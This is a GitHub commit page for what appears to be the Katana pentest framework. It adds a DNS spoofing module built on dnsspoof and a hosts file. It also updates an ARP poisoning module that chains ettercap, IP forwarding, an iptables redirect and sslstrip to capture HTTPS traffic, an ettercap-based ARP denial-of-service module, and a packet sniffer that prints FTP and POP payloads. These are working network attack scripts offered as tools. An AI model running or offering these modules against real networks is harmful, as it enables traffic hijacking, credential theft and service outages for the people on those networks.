Skip to content

Commit

Permalink
Update
Browse files Browse the repository at this point in the history
  • Loading branch information
root committed Jul 29, 2016
1 parent f3b19f9 commit 72005fa
Show file tree
Hide file tree
Showing 9 changed files with 93 additions and 21 deletions.
4 changes: 4 additions & 0 deletions LINETIME
Original file line number Diff line number Diff line change
@@ -1,3 +1,7 @@
* 29/07/16
Change Name-Code Module : at.arpsp -> net/arp.pson
Adedd New Module: dns.spoof, dns spoofing attack

* 28/07/16
Upgrading to Core:0.0.0.1 Build:0062

Expand Down
5 changes: 3 additions & 2 deletions core/Default.py
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@
# change value of variables for adapter to your system.
#
#
# Last Modified: 01/06/2016
# Last Modified: 29/27/2016
#
#########################################################HEAD#

Expand Down Expand Up @@ -50,6 +50,7 @@
NMAP_PATH ="/usr/bin/nmap"
"""Commons"""
LOCAL_IP ="127.0.0.1"
INTERFACE_ETHERNET ="eth0"
INTERFACE_DEVICE ="wlan0"
INTERFACE_MONITOR ="wlan0mon"
MAC_TARGET ="AA:A1:BB:B2:CC:C1"
Expand All @@ -67,4 +68,4 @@
SQL_PORT ="3306"
SSH_PORT ="22"
SMTP_PORT ="25"
# END DEFAULT VARIABLES
# END DEFAULT VARIABLES
9 changes: 8 additions & 1 deletion core/modules.xml
Original file line number Diff line number Diff line change
Expand Up @@ -63,7 +63,7 @@
<filename>sniff</filename>
<description>Protocol Sniffer.</description>
</module>
<module name="net/at.arpsp">
<module name="net/arp.pson">
<version>3.1</version>
<author>RedToor</author>
<category>net</category>
Expand All @@ -77,6 +77,13 @@
<filename>arp_denegation_of_service</filename>
<description>ARP D.O.S Attack.</description>
</module>
<module name="net/dns.spoof">
<version>1.0</version>
<author>RedToor</author>
<category>net</category>
<filename>dns_spoofing</filename>
<description>DNS Spoofing.</description>
</module>
<module name="net/dns.fake">
<version>1.0</version>
<author>Dimitrios Kanellopoulos | Adated by RedToor</author>
Expand Down
2 changes: 2 additions & 0 deletions files/test/host
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@

192.168.1.67 rubias19.com
10 changes: 5 additions & 5 deletions modules/net/arp_denegation_of_service.py
Original file line number Diff line number Diff line change
Expand Up @@ -25,10 +25,10 @@ def init():

# DEFAULT OPTIONS MODULE
init.options = {
# NAME VALUE RQ DESCRIPTION
'interface':["eth0" ,True ,'Interface'],
'target' :["192.168.1.223",True ,'Target IP'],
'gateway' :[get_gateway() ,True ,'Gateway IP']
# NAME VALUE RQ DESCRIPTION
'interface':[INTERFACE_ETHERNET,True ,'Interface'],
'target' :["192.168.1.223" ,True ,'Target IP'],
'gateway' :[get_gateway() ,True ,'Gateway IP']
}
return init
# END INFORMATION MODULE
Expand All @@ -39,7 +39,7 @@ def main(run):
if isConect() and checkDevice(init.var['interface']):
printAlert(0,"Starting ARP D.O.S attack...")
Subprocess("ettercap -Tq -P rand_flood /"+init.var['target']+"// /"+init.var['gateway']+"// -i "+init.var['interface'])
raw_input(printAlert(8,"for Stop ARP D.O.S Attack (PRESS [ENTER])\n"))
raw_input(printAlert(8,"to Stop ARP D.O.S Attack (PRESS [ENTER])\n"))
commands.getoutput("killall ettercap")

# END CODE MODULE ############################################################################################
20 changes: 12 additions & 8 deletions modules/net/arp_poisoning_attack.py
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@
# :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: #

# LIBRARIES
from core.Function import get_gateway,isConect,Subprocess,checkDevice
from core.Function import get_gateway,isConect,Subprocess,checkDevice,get_interfaces
import commands
# END LIBRARIES

Expand All @@ -16,7 +16,7 @@ def init():
init.Author ="RedToor"
init.Version ="3.1"
init.Description ="ARP Poisoning"
init.CodeName ="net/at.arpsp"
init.CodeName ="net/arp.pson"
init.DateCreation ="26/08/2015"
init.LastModification ="27/07/2016"
init.References =None
Expand All @@ -25,12 +25,16 @@ def init():

# DEFAULT OPTIONS MODULE
init.options = {
# NAME VALUE RQ DESCRIPTION
'interface':["eth0" ,True ,'Interface'],
'target' :["192.168.1.223",True ,'Target IP'],
'gateway' :[get_gateway() ,True ,'Gateway IP'],
'https' :[True ,False,'HTTP/s Capture']
# NAME VALUE RQ DESCRIPTION
'interface':[INTERFACE_ETHERNET,True ,'Interface'],
'target' :["192.168.1.223" ,True ,'Target IP'],
'gateway' :[get_gateway() ,True ,'Gateway IP'],
'https' :[True ,False,'HTTP/s Capture']
}

init.aux = """
Devices Founds: """+str(get_interfaces())+"""
"""
return init
# END INFORMATION MODULE

Expand All @@ -46,7 +50,7 @@ def main(run):
commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forward")
commands.getoutput("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000")
Subprocess("sslstrip")
raw_input(printAlert(8,"Stop Attack ARP (PRESS ANY KEY)\n"))
raw_input(printAlert(8,"to Stop Attack ARP (PRESS ANY KEY)\n"))
commands.getoutput("killall ettercap")
commands.getoutput("killall sslstrip")
commands.getoutput("iptables --flush -t nat")
Expand Down
55 changes: 55 additions & 0 deletions modules/net/dns_spoofing.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,55 @@
# This module requires katana framework
# https://github.com/PowerScript/KatanaFramework

# :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: #
# Katana Core import #
from core.KATANAFRAMEWORK import * #
# :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: #

# LIBRARIES
from core.Function import get_gateway,isConect,Subprocess,checkDevice,get_interfaces
import commands
# END LIBRARIES

# INFORMATION MODULE
def init():
init.Author ="RedToor"
init.Version ="1.0"
init.Description ="DNS Spoofing"
init.CodeName ="net/dns.spoof"
init.DateCreation ="29/07/2016"
init.LastModification ="29/07/2016"
init.References =None
init.License =KTF_LINCENSE
init.var ={}

# DEFAULT OPTIONS MODULE
init.options = {
# NAME VALUE RQ DESCRIPTION
'interface':[INTERFACE_ETHERNET,True ,'Interface'],
'hostfile' :["files/test/host" ,True ,'DNS\'s Spoofed File']
}

init.aux = """
Devices Founds: """+str(get_interfaces())+"""
Functions : to edit the DNS rules. 'x::nano """+init.options['hostfile'][0]+"""'
"""
return init
# END INFORMATION MODULE

# CODE MODULE ############################################################################################
def main(run):
if isConect() and checkDevice(init.var['interface']):
Loadingfile(init.var['hostfile'])
open(init.var['hostfile'],'r')
printAlert(0,"Starting DNS spoofing [dnsspoof].")
commands.getoutput("iptables --flush -t nat")
commands.getoutput("sudo fuser -kuv 53/udp >/dev/null 2>&1 ")
commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forward")
Subprocess("dnsspoof -i "+init.var['interface']+" -f "+init.var['hostfile'])
raw_input(printAlert(8,"to Stop DNS Spoof Attack (PRESS ANY KEY)\n"))
commands.getoutput("killall dnsspoof")
commands.getoutput("echo 0 > /proc/sys/net/ipv4/ip_forward")
commands.getoutput("iptables --flush -t nat")

# END CODE MODULE ############################################################################################
1 change: 0 additions & 1 deletion modules/net/get_hosts_live.py
Original file line number Diff line number Diff line change
Expand Up @@ -36,7 +36,6 @@ def init():

# CODE MODULE ############################################################################################
def main(run):
KTFVAR=[]
commands.getoutput(NMAP_PATH+' -sn '+str(init.var['range'])+' -oX tmp/KTFVAR.xml > null')
GateWay=get_gateway()
tree = ET.parse('tmp/KTFVAR.xml')
Expand Down
8 changes: 4 additions & 4 deletions modules/net/sniff.py
Original file line number Diff line number Diff line change
Expand Up @@ -25,9 +25,9 @@ def init():

# DEFAULT OPTIONS MODULE
init.options = {
# NAME VALUE RQ DESCRIPTION
'drive' :[INTERFACE_MONITOR,True ,'Monitor Interface'],
'filter':["ALL" ,False,'Filter sniff']
# NAME VALUE RQ DESCRIPTION
'interface' :[INTERFACE_ETHERNET,True ,'Monitor Interface'],
'filter' :["ALL" ,False,'Filter sniff']
}

init.aux = """
Expand Down Expand Up @@ -67,4 +67,4 @@ def callback(pkt):
if pkt.dport == 21:return " "+str(pkt[IP].id)+"\t"+colors[12]+" FTP "+colors[0]+" "+str(pkt[IP].src)+"->\t\t"+str(pkt[IP].dst)+"\t"+pkt[Raw].load.replace("\n", ".")+colors[0]
if pkt.dport == 110:return " "+str(pkt[IP].id)+"\t"+colors[11]+" POP "+colors[0]+" "+str(pkt[IP].src)+"->\t\t"+colors[0]
if init.var['filter'] == "ALL":return " "+colors[9]+str(pkt[IP].id)+"\t"+" Other "+" "+str(pkt[IP].src)+"->\t\t"+colors[0]
except:n=None
except:n=None

0 comments on commit 72005fa

Please sign in to comment.